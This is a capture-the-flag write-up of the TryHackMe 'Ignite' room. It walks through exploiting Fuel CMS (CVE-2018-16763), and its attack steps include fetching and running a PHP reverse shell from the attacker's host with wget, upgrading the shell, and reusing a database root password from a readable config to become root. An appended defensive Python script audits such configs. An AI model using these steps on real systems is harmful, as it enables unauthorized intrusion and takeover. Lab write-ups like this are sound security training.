WriteUp — THM Ignite

Jari Laurila
Oct 13, 2020


A new start-up has a few issues with their web server.

This is a writeup for TryHackMe Ignite room.

Start with nmap:

nmap -sC -sV -p- 10.10.67.163 
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-13 10:47 EEST
Nmap scan report for 10.10.67.163
Host is up (0.055s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/fuel/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Welcome to FUEL CMS

Let’s take a look at robots.txt:

User-agent: *
Disallow: /fuel/

Let’s take a look at that directory. It reveals a login screen to the CMS.

A quick web search finds a vulnerability in version 1.4: https://www.exploit-db.com/exploits/47138, and we seem to have the exploit available locally already:

searchsploit fuel cms 

Fuel CMS 1.4.7 - 'col' SQL Injection (Authenticated) | php/webapps/48741.txt
Fuel CMS 1.4.8 - 'fuel_replace_id' SQL Injection (Authenticated) | php/webapps/48778.txt
fuelCMS 1.4.1 - Remote Code Execution | linux/webapps/47138.py

Let’s take a look at the vulnerability, CVE-2018-16763, to figure out how it works. I needed to modify the script a bit to support Python 3, as I had some environment issues with Python 2.

OK, let’s grab a reverse shell from https://github.com/pentestmonkey/php-reverse-shell . Modify it to point to my attack box, serve it with python -m SimpleHTTPServer and upload it to the target using the exploit script’s command prompt:

wget http://10.8.108.247:8000/php-reverse-shell.php
php php-reverse-shell.php

And we are in. Upgrade the shell to a proper terminal using

python -c 'import pty; pty.spawn("/bin/bash")'

Grab the user flag from /home/www-data:

cat flag.txt
__REDACTED__

Browse around the file system. Grab mysql credentials from Fuel CMS configs:

// CodeIgniter-style database config used by Fuel CMS; readable from the www-data shell
$db['default'] = array(
    'dsn' => '',
    'hostname' => 'localhost',
    'username' => 'root',
    'password' => '__REDACTED__',
    'database' => 'fuel_schema',
    'dbdriver' => 'mysqli',
    'dbprefix' => '',
    'pconnect' => FALSE,
    'db_debug' => (ENVIRONMENT !== 'production'),
    'cache_on' => FALSE,
    'cachedir' => '',
    'char_set' => 'utf8',
    'dbcollat' => 'utf8_general_ci',
    'swap_pre' => '',
    'encrypt' => FALSE,
    'compress' => FALSE,
    'stricton' => FALSE,
    'failover' => array(),
    'save_queries' => TRUE
);

This can’t possibly be the root password. Or can it?

su
Password: __REDACTED__
whoami
root
cat /root/root.txt
__REDACTED__
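The root takeover above came down to a readable CMS config holding a MySQL root password that was reused for the OS root account. As an added example (not part of the original writeup or of Fuel CMS), here is a small audit script that parses a CodeIgniter-style `$db['default']` array, flags the settings that widen the blast radius of a config-file read, and checks whether the file is readable by every local user; the sample config is constructed to mirror the one quoted above, with a placeholder password.

```python
import os
import re
import stat

# Constructed sample mirroring the $db['default'] array from the writeup
# (real password replaced with a placeholder).
SAMPLE_CONFIG = """
$db['default'] = array(
    'dsn' => '',
    'hostname' => 'localhost',
    'username' => 'root',
    'password' => 'PLACEHOLDER_PASSWORD',
    'database' => 'fuel_schema',
    'db_debug' => (ENVIRONMENT !== 'production'),
    'encrypt' => FALSE,
    'save_queries' => TRUE
);
"""

# 'key' => 'quoted value'   or   'key' => bare PHP expression up to the next comma
KV_RE = re.compile(r"'(\w+)'\s*=>\s*(?:'([^']*)'|([^,\n]+))")


def parse_db_config(text):
    """Extract the $db['default'] settings as a dict of raw string values."""
    cfg = {}
    for m in KV_RE.finditer(text):
        key, quoted, bare = m.group(1), m.group(2), m.group(3)
        cfg[key] = quoted if quoted is not None else bare.strip()
    return cfg


def audit_db_config(cfg):
    """Return findings for settings that make a leaked config more damaging."""
    findings = []
    if cfg.get("username") == "root":
        findings.append("username: CMS connects as MySQL root; use a least-privilege DB account")
    if cfg.get("password", "") == "":
        findings.append("password: empty DB password")
    if cfg.get("db_debug", "").upper() != "FALSE":
        findings.append("db_debug: not hard-coded FALSE; SQL errors leak if ENVIRONMENT is not 'production'")
    if cfg.get("encrypt", "").upper() == "FALSE" and cfg.get("hostname") not in ("localhost", "127.0.0.1"):
        findings.append("encrypt: plaintext DB connection to a remote host")
    return findings


def file_world_readable(path):
    """True if any local user can read the config file (mode has the o+r bit)."""
    return bool(os.stat(path).st_mode & stat.S_IROTH)
```

The web server account must still be able to read its own config, so the permission check only narrows who else can; the decisive mitigation is never reusing the database password for a system account.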
